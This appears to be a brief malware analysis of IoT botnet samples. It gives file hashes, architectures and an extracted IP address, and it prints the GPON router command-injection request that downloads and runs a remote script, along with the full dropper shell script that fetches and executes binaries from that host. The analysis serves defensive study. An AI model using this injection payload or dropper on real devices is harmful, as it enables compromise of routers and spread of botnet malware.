Hash List
:~/collected$ sha256sum *
efa4fe06e4949c0f7aedea61a79da92e379ea66b169cd1d99c47b9e93e814093 arm
1ff787d52bc9ec27d75b1a427c3e5dd16d6d5f082a79227c14edf8e908ab2 arm7
bab7e9f42df88902acb00fbdf3b4b5d8ffec2a1a7ad32eb5f2fb1dbf38f3167d mips
a79964ce5cf4b92f996bbc24230e102b94ef05fb072c0afdeabc88d28695cace mipsel
Arch List
:~/collected$ file *
arm: ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
arm7: ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
mips: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
mipsel: ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
IP list
:~/collected$ strings * | grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b"
185.62.190.191
185.62.190.191
185.62.190.191
185.62.190.191
Interesting strings
Probe for vulnerability:
/GponForm/diag_Form?images/
Execute code (check https://www.exploit-db.com/exploits/44576/ for more information):
XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://185.62.190.191/r+-O+->/tmp/r;sh+/tmp/r&ipv=0
The resource downloaded is r, a bash script
#!/bin/sh
n="arm mips mipsel arm7"
http_server="185.62.190.191"
#dirs="/tmp /var /dev/shm /dev"
dirs="/tmp"
for dir in $dirs
do
>$dir/c && cd $dir
done
for i in $n
do
cp $SHELL $i
>$i
wget http://$http_server/$i -O -> $i
chmod 777 $i
./$i
done